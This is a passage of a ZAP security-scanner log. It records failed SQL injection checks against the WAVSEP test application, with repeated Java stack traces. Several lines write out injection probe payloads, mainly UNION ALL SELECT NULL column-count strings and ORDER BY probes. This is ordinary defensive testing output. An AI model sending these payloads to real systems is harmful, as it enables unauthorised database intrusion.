org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680449 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680450 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680451 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680456 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680457 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680458 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1144#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1144# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680458 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680459 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) 